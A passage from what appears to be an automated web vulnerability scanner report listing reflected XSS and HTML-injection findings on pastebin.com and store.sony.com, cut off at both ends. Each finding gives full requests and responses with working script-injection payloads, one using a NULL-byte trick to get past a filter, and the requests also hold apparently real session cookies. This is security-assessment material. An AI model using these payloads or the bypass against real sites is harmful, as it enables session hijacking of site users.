The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dac32"><script>alert(1)</script>a0c8a47198e was submitted in the REST URL parameter 2. This input was echoed as dac32\"><script>alert(1)</script>a0c8a47198e in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/ZeroClipboard.swfdac32"><script>alert(1)</script>a0c8a47198e HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:50 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=9; expires=Tue, 04-Oct-2011 18:10:50 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10571 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/js/ZeroClipboard.swfdac32\"><script>alert(1)</script>a0c8a47198e "/>...[SNIP]...
1.25. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntk parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The value of the Ntk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a90df"><a>002cb1260d was submitted in the Ntk parameter. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd&langId=-1&Ntk=Producta90df"><a>002cb1260d &storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 87955 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 87955 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:58:20 GMT Connection: close Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --> <script type...[SNIP]... <a href="SearchCatalog?Ntt=dvd+cd&Ntk=Producta90df"><a>002cb1260d &langId=-1&storeId=10151&Ntx=mode matchallpartial&y=0&N=0&catalogId=10551&x=0" id="" class="breadBoxRemoveLink" rel="">...[SNIP]...
1.26. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The value of the Ntt request parameter is copied into a JavaScript rest-of-line comment. The payload 22e7a%0af613d80aa8c was submitted in the Ntt parameter. This input was echoed as 22e7a f613d80aa8c in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c &langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 91021 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 91021 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:58:19 GMT Connection: close Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --> <script type...[SNIP]... name to call feedback URL setpageName(s.pageName); // Server (Not sure what this does) s.server='' // Site Section s.channel='' // Error Page Flag // Online Search Terms s.prop1= searchTerm; //'dvd cd22e7a f613d80aa8c ' // # Of Search Results s.prop2='0' // Page Template Type s.prop3='SearchCatalog' // Department s.prop4='' // Category s.prop5='' // E-Spot Impressions s.prop6=s.pageName+'_'+epotpageImpression; //s.p...[SNIP]...
1.27. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The value of the Ntt request parameter is copied into the HTML document as plain text between tags. The payload 17748<a%20b%3dc>df6b2e2de39 was submitted in the Ntt parameter. This input was echoed as 17748<a b=c>df6b2e2de39 in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd17748<a%20b%3dc>df6b2e2de39 &langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 91102 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 91102 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:58:12 GMT Connection: close Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --> <script type...[SNIP]... com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd cd17748<a b=c>df6b2e2de39');return false;"> Search "dvd cd17748<a b=c>df6b2e2de39 " on <span class="searchTerm">...[SNIP]...
1.28. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00119e4"><script>alert(1)</script>575ce0e01d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 119e4"><script>alert(1)</script>575ce0e01d1 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0&%00119e4"><script>alert(1)</script>575ce0e01d1 =1 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 115393 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 115393 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:59:06 GMT Connection: close Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --> <script type...[SNIP]... <a href="SearchCatalog?langId=-1&.119e4"><script>alert(1)</script>575ce0e01d1 =1&storeId=10151&y=0&catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">...[SNIP]...
1.29. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [x parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
